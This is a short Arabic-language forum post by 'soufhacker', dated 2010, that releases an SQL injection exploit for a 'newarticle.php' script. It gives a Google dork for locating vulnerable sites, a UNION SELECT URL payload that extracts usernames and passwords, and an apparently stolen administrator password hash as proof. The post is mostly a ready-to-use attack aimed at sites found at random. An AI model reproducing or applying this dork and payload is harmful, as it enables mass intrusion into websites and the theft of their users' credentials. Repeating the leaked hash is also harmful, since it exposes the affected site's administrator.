بسم الله الرحمان الرحيم
السلام عليكم و رحمة الله و بركاته و بعد
#
Exploit Title : Sql Injection Vulnerability
# Date : 18-08-2010
# Author : soufhacker
# Version : All Versions
###############################################
Dork google: inurl:newarticle.php?id=
###############################################
Exploit:
http://site.com/path/newarticle.php?id=-805+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29+from+access_all_areas.user--
###############################################
username : Admin
password : $1$V-s+pArA$T9V7JXDNeJ2AqiV9kfgCl/
Done!
#############soufhacker################
08-19-2010, 10:24 AM
ثغرة أعلن عنها لأول مرة هنا في منتدى vbspiders
المواضيع المتشابهه
العرض الشجري